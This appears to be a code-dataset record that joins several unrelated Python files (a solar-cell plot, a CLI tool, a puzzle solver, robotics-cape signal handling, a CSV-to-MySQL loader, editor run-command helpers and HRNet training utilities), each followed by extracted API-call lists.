[((997, 1036), 'logging.getLogger', 'logging.getLogger', (['"""ydk.tests.unittest"""'], {}), "('ydk.tests.unittest')\n", (1014, 1036), False, 'import logging\n')]
|
#!/usr/bin/env python3
import numpy as np
import matplotlib.pyplot as plt
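# Ideal single-diode solar-cell model: sweep the load current and compute the
# diode (terminal) voltage V_D = V_T * ln((i_ph - i_load)/i_s + 1) and the
# power delivered to the load.
# V_T = k*T/q at 300 K (~25.9 mV); i_s: saturation current; i_ph: photocurrent;
# m = 1e-3 scales the plot axes to mA and mW.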
m = 1e-3
i_load = np.logspace(-5,-3)
i_load = np.linspace(1e-5,1e-3,200)
i_s = 1e-12
i_ph = 1e-3
V_T = 1.38e-23*300/1.6e-19
V_D = V_T*np.log((i_ph - i_load)/(i_s) + 1)
P_load = V_D*i_load
plt.subplot(2,1,1)
plt.plot(i_load/m,V_D)
plt.ylabel("Diode voltage [V]")
plt.grid()
plt.subplot(2,1,2)
plt.plot(i_load/m,P_load/m)
plt.xlabel("Current load [mA]")
plt.ylabel("Power Load [mW]")
plt.grid()
plt.savefig("pv.pdf")
plt.show()
|
[
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.show",
"numpy.log",
"matplotlib.pyplot.plot",
"numpy.logspace",
"numpy.linspace",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.grid",
"matplotlib.pyplot.savefig"
] |
[((94, 113), 'numpy.logspace', 'np.logspace', (['(-5)', '(-3)'], {}), '(-5, -3)\n', (105, 113), True, 'import numpy as np\n'), ((122, 152), 'numpy.linspace', 'np.linspace', (['(1e-05)', '(0.001)', '(200)'], {}), '(1e-05, 0.001, 200)\n', (133, 152), True, 'import numpy as np\n'), ((271, 291), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(1)'], {}), '(2, 1, 1)\n', (282, 291), True, 'import matplotlib.pyplot as plt\n'), ((290, 315), 'matplotlib.pyplot.plot', 'plt.plot', (['(i_load / m)', 'V_D'], {}), '(i_load / m, V_D)\n', (298, 315), True, 'import matplotlib.pyplot as plt\n'), ((314, 345), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Diode voltage [V]"""'], {}), "('Diode voltage [V]')\n", (324, 345), True, 'import matplotlib.pyplot as plt\n'), ((346, 356), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (354, 356), True, 'import matplotlib.pyplot as plt\n'), ((357, 377), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(2)'], {}), '(2, 1, 2)\n', (368, 377), True, 'import matplotlib.pyplot as plt\n'), ((376, 408), 'matplotlib.pyplot.plot', 'plt.plot', (['(i_load / m)', '(P_load / m)'], {}), '(i_load / m, P_load / m)\n', (384, 408), True, 'import matplotlib.pyplot as plt\n'), ((404, 435), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Current load [mA]"""'], {}), "('Current load [mA]')\n", (414, 435), True, 'import matplotlib.pyplot as plt\n'), ((436, 465), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Power Load [mW]"""'], {}), "('Power Load [mW]')\n", (446, 465), True, 'import matplotlib.pyplot as plt\n'), ((466, 476), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (474, 476), True, 'import matplotlib.pyplot as plt\n'), ((477, 498), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""pv.pdf"""'], {}), "('pv.pdf')\n", (488, 498), True, 'import matplotlib.pyplot as plt\n'), ((499, 509), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (507, 509), True, 'import matplotlib.pyplot as plt\n'), ((214, 247), 'numpy.log', 'np.log', (['((i_ph - i_load) / i_s + 1)'], {}), '((i_ph - i_load) / i_s + 1)\n', (220, 247), True, 'import numpy as np\n')]
|
import argparse
from pathlib import Path
from novel_tools.toolkit import analyze, docgen
from novel_tools.utils import get_config
def do_analyze(args):
config_filename = args.toolkit + '_config.json'
input_path = Path(args.input)
output_path = Path(args.output) if args.output is not None else None
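    # A single input file is read directly (only recognized by TextReader);
    # otherwise the input is treated as a directory. The toolkit config is
    # loaded from the file's parent directory or from the input directory.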
if input_path.is_file():
in_dir = input_path.parent
config = get_config(config_filename, in_dir)
analyze(config, filename=input_path, out_dir=output_path)
else:
config = get_config(config_filename, input_path)
analyze(config, in_dir=input_path, out_dir=output_path)
def start():
parser = argparse.ArgumentParser(description='Novel Tools command line interface.')
subparsers = parser.add_subparsers(help='Tools provided by this package.', dest='command', required=True)
# Framework functions #
analyze_parser = subparsers.add_parser('analyze', description='Analyzes the novel file(s).')
analyze_parser.add_argument('-t', '--toolkit',
                                help='The toolkit that will be executed. Built-in toolkits include '
'struct, create, split, struct_dir, and create_dir. If a custom toolkit is given, '
'make sure to have <toolkit>_config.json under the input directory.')
analyze_parser.add_argument('-i', '--input',
help='Input filename or directory name. If it is a file, it will only be recognized by'
' TextReader, and it must contain the full path.')
analyze_parser.add_argument('-o', '--output', default=None, help='Output directory name.')
analyze_parser.set_defaults(func=do_analyze)
# generate_docs
doc_parser = subparsers.add_parser('docgen', description='Generates documentation for framework classes.')
doc_parser.add_argument('-c', '--config_filename', default=None,
help='Filename of the config which specifies additional packages.')
doc_parser.add_argument('-d', '--doc_filename', default=None, help='Filename of the output doc file.')
doc_parser.set_defaults(func=lambda a: docgen(a.config_filename, a.doc_filename))
args = parser.parse_args()
args.func(args)
if __name__ == '__main__':
start()
|
[
"argparse.ArgumentParser",
"novel_tools.toolkit.docgen",
"novel_tools.utils.get_config",
"novel_tools.toolkit.analyze",
"pathlib.Path"
] |
[((223, 239), 'pathlib.Path', 'Path', (['args.input'], {}), '(args.input)\n', (227, 239), False, 'from pathlib import Path\n'), ((655, 729), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Novel Tools command line interface."""'}), "(description='Novel Tools command line interface.')\n", (678, 729), False, 'import argparse\n'), ((258, 275), 'pathlib.Path', 'Path', (['args.output'], {}), '(args.output)\n', (262, 275), False, 'from pathlib import Path\n'), ((394, 429), 'novel_tools.utils.get_config', 'get_config', (['config_filename', 'in_dir'], {}), '(config_filename, in_dir)\n', (404, 429), False, 'from novel_tools.utils import get_config\n'), ((438, 495), 'novel_tools.toolkit.analyze', 'analyze', (['config'], {'filename': 'input_path', 'out_dir': 'output_path'}), '(config, filename=input_path, out_dir=output_path)\n', (445, 495), False, 'from novel_tools.toolkit import analyze, docgen\n'), ((523, 562), 'novel_tools.utils.get_config', 'get_config', (['config_filename', 'input_path'], {}), '(config_filename, input_path)\n', (533, 562), False, 'from novel_tools.utils import get_config\n'), ((571, 626), 'novel_tools.toolkit.analyze', 'analyze', (['config'], {'in_dir': 'input_path', 'out_dir': 'output_path'}), '(config, in_dir=input_path, out_dir=output_path)\n', (578, 626), False, 'from novel_tools.toolkit import analyze, docgen\n'), ((2193, 2234), 'novel_tools.toolkit.docgen', 'docgen', (['a.config_filename', 'a.doc_filename'], {}), '(a.config_filename, a.doc_filename)\n', (2199, 2234), False, 'from novel_tools.toolkit import analyze, docgen\n')]
|
from itertools import combinations
def get_data(filepath):
return [int(line) for line in open(filepath).readlines()]
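# Part 1: return the first number that is not the sum of any two of the
# `preamble` numbers immediately before it.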
def solve1(filepath, preamble):
inputs = get_data(filepath)
for i, line in enumerate(inputs):
if i <= preamble:
continue
sums = set(sum(comb) for comb in combinations(inputs[i-preamble:i], 2))
if line not in sums:
return line
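# Part 2: find a contiguous run of numbers that sums to the Part 1 answer and
# return the sum of its smallest and largest values.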
def solve2(filepath, preamble):
target = solve1(filepath, preamble)
inputs = get_data(filepath)
for i, input1 in enumerate(inputs):
for i2, input2 in enumerate(inputs[i:]):
values = inputs[i:i2]
sum_ = sum(values)
if sum_ == target:
return min(values)+max(values)
if sum_ > target:
break
assert solve1('test', 5) == 127
print('Part 1: %d' % solve1('input', 25))
assert solve2('test', 5) == 62
print('Part 2: %s' % solve2('input', 25))
|
[
"itertools.combinations"
] |
[((313, 352), 'itertools.combinations', 'combinations', (['inputs[i - preamble:i]', '(2)'], {}), '(inputs[i - preamble:i], 2)\n', (325, 352), False, 'from itertools import combinations\n')]
|
import warnings
import signal
import sys, os, time
from rcpy._rcpy import initialize, cleanup, get_state
from rcpy._rcpy import set_state as _set_state
from rcpy._rcpy import cleanup as _cleanup
#from hanging_threads import start_monitoring
#monitoring_thread = start_monitoring()
# constants
IDLE = 0
RUNNING = 1
PAUSED = 2
EXITING = 3
# create pipes for communicating state
_RC_STATE_PIPE_LIST = []
def _get_state_pipe_list(p = _RC_STATE_PIPE_LIST):
return p
# creates pipes for communication
def create_pipe():
r_fd, w_fd = os.pipe()
_get_state_pipe_list().append((r_fd, w_fd))
return (r_fd, w_fd)
def destroy_pipe(pipe):
_get_state_pipe_list().remove(pipe)
(r_fd, w_fd) = pipe
os.close(r_fd)
os.close(w_fd)
# set state
def set_state(state):
# write to open pipes
for (r_fd, w_fd) in _get_state_pipe_list():
os.write(w_fd, bytes(str(state), 'UTF-8'))
# call robotics cape set_state
_set_state(state)
# cleanup function
_CLEANUP_FLAG = False
_cleanup_functions = {}
def add_cleanup(fun, pars):
global _cleanup_functions
_cleanup_functions[fun] = pars
def cleanup():
global _CLEANUP_FLAG
global _cleanup_functions
# return to avoid multiple calls to cleanup
if _CLEANUP_FLAG:
return
_CLEANUP_FLAG = True
print('Initiating cleanup...')
# call cleanup functions
for fun, pars in _cleanup_functions.items():
fun(*pars)
# get state pipes
pipes = _get_state_pipe_list()
if len(pipes):
print('{} pipes open'.format(len(pipes)))
# set state as exiting
set_state(EXITING)
print('Calling roboticscape cleanup')
# call robotics cape cleanup
_cleanup()
if len(pipes):
print('Closing pipes')
# close open pipes left
while len(pipes):
destroy_pipe(pipes[0])
    print('Done with cleanup')
# idle function
def idle():
set_state(IDLE)
# run function
def run():
set_state(RUNNING)
# pause function
def pause():
set_state(PAUSED)
# exit function
def exit():
set_state(EXITING)
# cleanup handler
def handler(signum, frame):
# warn
warnings.warn('Signal handler called with signal {}'.format(signum))
# call rcpy cleanup
cleanup()
# no need to cleanup later
atexit.unregister(cleanup)
warnings.warn('> Robotics cape exited cleanly')
raise KeyboardInterrupt()
# initialize cape
initialize()
# set initial state
set_state(PAUSED)
warnings.warn('> Robotics cape initialized')
# make sure it is disabled when exiting cleanly
import atexit; atexit.register(cleanup)
if 'RCPY_NO_HANDLERS' in os.environ:
warnings.warn('> RCPY_NO_HANDLERS is set. User is responsible for handling signals')
else:
# install handler
warnings.warn('> Installing signal handlers')
signal.signal(signal.SIGINT, handler)
signal.signal(signal.SIGTERM, handler)
|
[
"atexit.register",
"os.pipe",
"os.close",
"rcpy._rcpy.set_state",
"warnings.warn",
"signal.signal",
"rcpy._rcpy.cleanup",
"atexit.unregister",
"rcpy._rcpy.initialize"
] |
[((2471, 2483), 'rcpy._rcpy.initialize', 'initialize', ([], {}), '()\n', (2481, 2483), False, 'from rcpy._rcpy import initialize, cleanup, get_state\n'), ((2523, 2567), 'warnings.warn', 'warnings.warn', (['"""> Robotics cape initialized"""'], {}), "('> Robotics cape initialized')\n", (2536, 2567), False, 'import warnings\n'), ((2632, 2656), 'atexit.register', 'atexit.register', (['cleanup'], {}), '(cleanup)\n', (2647, 2656), False, 'import atexit\n'), ((542, 551), 'os.pipe', 'os.pipe', ([], {}), '()\n', (549, 551), False, 'import sys, os, time\n'), ((717, 731), 'os.close', 'os.close', (['r_fd'], {}), '(r_fd)\n', (725, 731), False, 'import sys, os, time\n'), ((736, 750), 'os.close', 'os.close', (['w_fd'], {}), '(w_fd)\n', (744, 750), False, 'import sys, os, time\n'), ((951, 968), 'rcpy._rcpy.set_state', '_set_state', (['state'], {}), '(state)\n', (961, 968), True, 'from rcpy._rcpy import set_state as _set_state\n'), ((1711, 1721), 'rcpy._rcpy.cleanup', '_cleanup', ([], {}), '()\n', (1719, 1721), True, 'from rcpy._rcpy import cleanup as _cleanup\n'), ((2287, 2296), 'rcpy._rcpy.cleanup', 'cleanup', ([], {}), '()\n', (2294, 2296), False, 'from rcpy._rcpy import initialize, cleanup, get_state\n'), ((2337, 2363), 'atexit.unregister', 'atexit.unregister', (['cleanup'], {}), '(cleanup)\n', (2354, 2363), False, 'import atexit\n'), ((2369, 2416), 'warnings.warn', 'warnings.warn', (['"""> Robotics cape exited cleanly"""'], {}), "('> Robotics cape exited cleanly')\n", (2382, 2416), False, 'import warnings\n'), ((2699, 2788), 'warnings.warn', 'warnings.warn', (['"""> RCPY_NO_HANDLERS is set. User is responsible for handling signals"""'], {}), "(\n '> RCPY_NO_HANDLERS is set. User is responsible for handling signals')\n", (2712, 2788), False, 'import warnings\n'), ((2822, 2867), 'warnings.warn', 'warnings.warn', (['"""> Installing signal handlers"""'], {}), "('> Installing signal handlers')\n", (2835, 2867), False, 'import warnings\n'), ((2872, 2909), 'signal.signal', 'signal.signal', (['signal.SIGINT', 'handler'], {}), '(signal.SIGINT, handler)\n', (2885, 2909), False, 'import signal\n'), ((2914, 2952), 'signal.signal', 'signal.signal', (['signal.SIGTERM', 'handler'], {}), '(signal.SIGTERM, handler)\n', (2927, 2952), False, 'import signal\n')]
|
#------------------------------------------ EXTRACT DATA FROM METADATA.CSV -------------------------------------------------
#
#                          our table has the same structure as the csv file downloaded
#
#
#--------------------------------------------------------------------------------------------------------------------------------
import pandas as pd
import unicodedata
import re
import string
import csv
import json
import itertools
from joblib import Parallel, delayed
import collections
from collections import Counter,defaultdict,OrderedDict,namedtuple
import mysql.connector
from settings import DB_CREDS
#establish a connection with the database
cnx = mysql.connector.connect(
host = DB_CREDS['host'],
user = DB_CREDS['user'],
passwd = DB_CREDS['pass'],
database = DB_CREDS['db']
)
cursor = cnx.cursor()
df = pd.read_csv('metadata.csv',low_memory=False)
#fill all null cells
df.fillna(" ",inplace=True)
index=0
for i in df.loc[:,'cord_uid']:
    # if only the year is given, fill in the rest of the date as year-1-1
if len(df.loc[index,'publish_time']) == 4:
year = df.loc[index,'publish_time']
df.loc[index,'publish_time'] = year + '-1-1'
    # pubmed_id is stored in the database as int; replace blank placeholders with 0
if df.loc[index,'pubmed_id'] == ' ':
df.loc[index,'pubmed_id'] = 0
    # save the extracted data in a tuple
data = (df.loc[index,'cord_uid'],df.loc[index,'sha'],df.loc[index,'source_x'],df.loc[index,'title'],df.loc[index,'doi'],df.loc[index,'pmcid'],df.loc[index,'pubmed_id'],df.loc[index,'license'],df.loc[index,'abstract'],df.loc[index,'publish_time'],df.loc[index,'authors'],df.loc[index,'journal'],df.loc[index,'mag_id'],df.loc[index,'who_covidence_id'],df.loc[index,'arxiv_id'],df.loc[index,'pdf_json_files'],df.loc[index,'pmc_json_files'],df.loc[index,'url'],df.loc[index,'s2_id'])
#insert our data into our database
add_data = ("INSERT IGNORE INTO general "
"(cord_uid , sha, source_x, title, doi, pmcid, pubmed_id, license, abstract, publish_time, authors, journal, mag_id, who_covidence_id, arxiv_id, pdf_json_files, pmc_json_files, url, s2_id) "
"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)")
cursor.execute(add_data,data)
cnx.commit()
index += 1
cursor.close()
cnx.close()
|
[
"pandas.read_csv"
] |
[((877, 922), 'pandas.read_csv', 'pd.read_csv', (['"""metadata.csv"""'], {'low_memory': '(False)'}), "('metadata.csv', low_memory=False)\n", (888, 922), True, 'import pandas as pd\n')]
|
from __future__ import annotations
import dataclasses
import os
from pathlib import Path
from typing import Dict, List, Optional
from porcupine import tabs, utils
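# Command describes a fully resolved run command: the "{...}" placeholders in
# command_format and cwd_format are filled in from `substitutions`, with the
# values quoted via utils.quote when the command string is built.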
@dataclasses.dataclass
class Command:
command_format: str
cwd_format: str
external_terminal: bool
substitutions: Dict[str, str]
def format_cwd(self) -> Path:
return Path(self.cwd_format.format(**self.substitutions))
def format_command(self) -> str:
return self.command_format.format(
**{name: utils.quote(value) for name, value in self.substitutions.items()}
)
@dataclasses.dataclass
class ExampleCommand:
command: str
windows_command: Optional[str] = None
macos_command: Optional[str] = None
working_directory: str = "{folder_path}"
external_terminal: bool = True
class Context:
def __init__(self, tab: tabs.FileTab, key_id: int):
assert tab.path is not None
self.file_path = tab.path
self.project_path = utils.find_project_root(tab.path)
self.key_id = key_id # with default bindings: 0 = F5, 1 = F6, 2 = F7, 3 = F8
self.filetype_name: str | None = tab.settings.get("filetype_name", Optional[str])
self.example_commands: list[ExampleCommand] = tab.settings.get(
"example_commands", List[ExampleCommand]
)
def get_substitutions(self) -> dict[str, str]:
return {
"file_stem": self.file_path.stem,
"file_name": self.file_path.name,
"file_path": str(self.file_path),
"folder_name": self.file_path.parent.name,
"folder_path": str(self.file_path.parent),
"project_name": self.project_path.name,
"project_path": str(self.project_path),
}
def prepare_env() -> dict[str, str]:
env = dict(os.environ)
# If Porcupine is running within a virtualenv, ignore it
if "VIRTUAL_ENV" in env and "PATH" in env:
# os.pathsep = ":"
# os.sep = "/"
porcu_venv = env.pop("VIRTUAL_ENV")
env["PATH"] = os.pathsep.join(
p for p in env["PATH"].split(os.pathsep) if not p.startswith(porcu_venv + os.sep)
)
return env
|
[
"porcupine.utils.quote",
"porcupine.utils.find_project_root"
] |
[((987, 1020), 'porcupine.utils.find_project_root', 'utils.find_project_root', (['tab.path'], {}), '(tab.path)\n', (1010, 1020), False, 'from porcupine import tabs, utils\n'), ((514, 532), 'porcupine.utils.quote', 'utils.quote', (['value'], {}), '(value)\n', (525, 532), False, 'from porcupine import tabs, utils\n')]
|
# Modified based on the HRNet repo.
from __future__ import absolute_import, division, print_function
import logging
import os
import time
from pathlib import Path
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
class FullModel(nn.Module):
"""
    Distribute the loss computation across multiple GPUs to reduce
    the memory cost on the main GPU.
    See the following discussion:
https://discuss.pytorch.org/t/dataparallel-imbalanced-memory-usage/22551/21
"""
def __init__(self, model, loss):
super(FullModel, self).__init__()
self.model = model
self.loss = loss
def forward(self, inputs, labels, train_step=-1, **kwargs):
outputs, jac_loss, sradius = self.model(inputs, train_step=train_step, **kwargs)
loss = self.loss(outputs, labels)
return loss.unsqueeze(0), jac_loss.unsqueeze(0), outputs, sradius
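# Usage sketch (not part of the original file; `criterion` is a placeholder
# loss module): wrap the network and loss, then data-parallelize the wrapper
# so the loss is computed on each replica before being gathered:
#   full_model = nn.DataParallel(FullModel(model, criterion)).cuda()
#   loss, jac_loss, outputs, sradius = full_model(inputs, labels, train_step=step)
#   total_loss = loss.mean() + jac_loss.mean()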
def get_world_size():
if not torch.distributed.is_initialized():
return 1
return torch.distributed.get_world_size()
def get_rank():
if not torch.distributed.is_initialized():
return 0
return torch.distributed.get_rank()
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.initialized = False
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def initialize(self, val, weight):
self.val = val
self.avg = val
self.sum = val * weight
self.count = weight
self.initialized = True
def update(self, val, weight=1):
if not self.initialized:
self.initialize(val, weight)
else:
self.add(val, weight)
def add(self, val, weight):
self.val = val
self.sum += val * weight
self.count += weight
self.avg = self.sum / self.count
def value(self):
return self.val
def average(self):
return self.avg
def create_logger(cfg, cfg_name, phase="train"):
root_output_dir = Path(cfg.OUTPUT_DIR)
# set up logger
if not root_output_dir.exists():
print("=> creating {}".format(root_output_dir))
root_output_dir.mkdir()
dataset = cfg.DATASET.DATASET
model = cfg.MODEL.NAME
cfg_name = os.path.basename(cfg_name).split(".")[0]
final_output_dir = root_output_dir / dataset / cfg_name
print("=> creating {}".format(final_output_dir))
final_output_dir.mkdir(parents=True, exist_ok=True)
time_str = time.strftime("%Y-%m-%d-%H-%M")
log_file = "{}_{}_{}.log".format(cfg_name, time_str, phase)
final_log_file = final_output_dir / log_file
head = "%(asctime)-15s %(message)s"
logging.basicConfig(filename=str(final_log_file), format=head)
logger = logging.getLogger()
logger.setLevel(logging.INFO)
console = logging.StreamHandler()
logging.getLogger("").addHandler(console)
tensorboard_log_dir = Path(cfg.LOG_DIR) / dataset / model / cfg_name
print("=> creating {}".format(tensorboard_log_dir))
tensorboard_log_dir.mkdir(parents=True, exist_ok=True)
return logger, str(final_output_dir), str(tensorboard_log_dir)
def get_optimizer(cfg, model):
optimizer = None
if cfg.TRAIN.OPTIMIZER == "sgd":
optimizer = optim.SGD(
filter(lambda p: p.requires_grad, model.parameters()),
lr=cfg.TRAIN.LR,
momentum=cfg.TRAIN.MOMENTUM,
weight_decay=cfg.TRAIN.WD,
nesterov=cfg.TRAIN.NESTEROV,
)
elif cfg.TRAIN.OPTIMIZER == "adam":
optimizer = optim.Adam(
filter(lambda p: p.requires_grad, model.parameters()),
lr=cfg.TRAIN.LR,
weight_decay=cfg.TRAIN.WD,
)
elif cfg.TRAIN.OPTIMIZER == "rmsprop":
optimizer = optim.RMSprop(
filter(lambda p: p.requires_grad, model.parameters()),
lr=cfg.TRAIN.LR,
momentum=cfg.TRAIN.MOMENTUM,
weight_decay=cfg.TRAIN.WD,
alpha=cfg.TRAIN.RMSPROP_ALPHA,
centered=cfg.TRAIN.RMSPROP_CENTERED,
)
return optimizer
def save_checkpoint(states, is_best, output_dir, filename="checkpoint.pth.tar"):
torch.save(states, os.path.join(output_dir, filename))
if is_best and "state_dict" in states:
torch.save(states["state_dict"], os.path.join(output_dir, "model_best.pth.tar"))
def get_confusion_matrix(label, pred, size, num_class, ignore=-1):
"""
    Calculate the confusion matrix from the given label and pred.
"""
output = pred.cpu().numpy().transpose(0, 2, 3, 1)
seg_pred = np.asarray(np.argmax(output, axis=3), dtype=np.uint8)
    seg_gt = np.asarray(label.cpu().numpy()[:, : size[-2], : size[-1]], dtype=int)
ignore_index = seg_gt != ignore
seg_gt = seg_gt[ignore_index]
seg_pred = seg_pred[ignore_index]
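    # Encode each (gt, pred) pair as a single flat index into the
    # num_class x num_class confusion matrix (row = ground truth, col = prediction).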
index = (seg_gt * num_class + seg_pred).astype("int32")
label_count = np.bincount(index)
confusion_matrix = np.zeros((num_class, num_class))
for i_label in range(num_class):
for i_pred in range(num_class):
cur_index = i_label * num_class + i_pred
if cur_index < len(label_count):
confusion_matrix[i_label, i_pred] = label_count[cur_index]
return confusion_matrix
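# "Poly" learning-rate schedule: lr = base_lr * (1 - cur_iter/max_iter)**power,
# applied in place to the optimizer's first parameter group.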
def adjust_learning_rate(optimizer, base_lr, max_iters, cur_iters, power=0.9):
lr = base_lr * ((1 - float(cur_iters) / max_iters) ** (power))
optimizer.param_groups[0]["lr"] = lr
return lr
################################################################################
# The following function are based on:
# https://github.com/espnet/espnet/blob/master/espnet/nets/pytorch_backend/nets_utils.py
def make_pad_mask(lengths, xs=None, length_dim=-1):
"""Make mask tensor containing indices of padded part.
Args:
lengths (LongTensor or List): Batch of lengths (B,).
xs (Tensor, optional): The reference tensor.
If set, masks will be the same shape as this tensor.
length_dim (int, optional): Dimension indicator of the above tensor.
See the example.
Returns:
Tensor: Mask tensor containing indices of padded part.
dtype=torch.uint8 in PyTorch 1.2-
dtype=torch.bool in PyTorch 1.2+ (including 1.2)
Examples:
With only lengths.
>>> lengths = [5, 3, 2]
>>> make_non_pad_mask(lengths)
masks = [[0, 0, 0, 0 ,0],
[0, 0, 0, 1, 1],
[0, 0, 1, 1, 1]]
With the reference tensor.
>>> xs = torch.zeros((3, 2, 4))
>>> make_pad_mask(lengths, xs)
tensor([[[0, 0, 0, 0],
[0, 0, 0, 0]],
[[0, 0, 0, 1],
[0, 0, 0, 1]],
[[0, 0, 1, 1],
[0, 0, 1, 1]]], dtype=torch.uint8)
>>> xs = torch.zeros((3, 2, 6))
>>> make_pad_mask(lengths, xs)
tensor([[[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1]],
[[0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 1, 1]],
[[0, 0, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1]]], dtype=torch.uint8)
With the reference tensor and dimension indicator.
>>> xs = torch.zeros((3, 6, 6))
>>> make_pad_mask(lengths, xs, 1)
tensor([[[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1]],
[[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1]],
[[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1]]], dtype=torch.uint8)
>>> make_pad_mask(lengths, xs, 2)
tensor([[[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1]],
[[0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 1, 1]],
[[0, 0, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1]]], dtype=torch.uint8)
"""
if length_dim == 0:
raise ValueError("length_dim cannot be 0: {}".format(length_dim))
if not isinstance(lengths, list):
lengths = lengths.tolist()
bs = int(len(lengths))
if xs is None:
maxlen = int(max(lengths))
else:
maxlen = xs.size(length_dim)
seq_range = torch.arange(0, maxlen, dtype=torch.int64)
seq_range_expand = seq_range.unsqueeze(0).expand(bs, maxlen)
seq_length_expand = seq_range_expand.new(lengths).unsqueeze(-1)
mask = seq_range_expand >= seq_length_expand
if xs is not None:
assert xs.size(0) == bs, (xs.size(0), bs)
if length_dim < 0:
length_dim = xs.dim() + length_dim
        # ind = (:, None, ..., None, :, None, ..., None)
ind = tuple(
slice(None) if i in (0, length_dim) else None for i in range(xs.dim())
)
mask = mask[ind].expand_as(xs).to(xs.device)
return mask
def make_non_pad_mask(lengths, xs=None, length_dim=-1):
"""Make mask tensor containing indices of non-padded part.
Args:
lengths (LongTensor or List): Batch of lengths (B,).
xs (Tensor, optional): The reference tensor.
If set, masks will be the same shape as this tensor.
length_dim (int, optional): Dimension indicator of the above tensor.
See the example.
Returns:
ByteTensor: mask tensor containing indices of padded part.
dtype=torch.uint8 in PyTorch 1.2-
dtype=torch.bool in PyTorch 1.2+ (including 1.2)
Examples:
With only lengths.
>>> lengths = [5, 3, 2]
>>> make_non_pad_mask(lengths)
masks = [[1, 1, 1, 1 ,1],
[1, 1, 1, 0, 0],
[1, 1, 0, 0, 0]]
With the reference tensor.
>>> xs = torch.zeros((3, 2, 4))
>>> make_non_pad_mask(lengths, xs)
tensor([[[1, 1, 1, 1],
[1, 1, 1, 1]],
[[1, 1, 1, 0],
[1, 1, 1, 0]],
[[1, 1, 0, 0],
[1, 1, 0, 0]]], dtype=torch.uint8)
>>> xs = torch.zeros((3, 2, 6))
>>> make_non_pad_mask(lengths, xs)
tensor([[[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 0]],
[[1, 1, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0]],
[[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0]]], dtype=torch.uint8)
With the reference tensor and dimension indicator.
>>> xs = torch.zeros((3, 6, 6))
>>> make_non_pad_mask(lengths, xs, 1)
tensor([[[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0]],
[[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]],
[[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]]], dtype=torch.uint8)
>>> make_non_pad_mask(lengths, xs, 2)
tensor([[[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 0]],
[[1, 1, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0]],
[[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0]]], dtype=torch.uint8)
"""
return ~make_pad_mask(lengths, xs, length_dim)
|
[
"torch.distributed.is_initialized",
"numpy.argmax",
"torch.distributed.get_rank",
"os.path.basename",
"logging.StreamHandler",
"numpy.zeros",
"time.strftime",
"pathlib.Path",
"torch.arange",
"torch.distributed.get_world_size",
"numpy.bincount",
"os.path.join",
"logging.getLogger"
] |
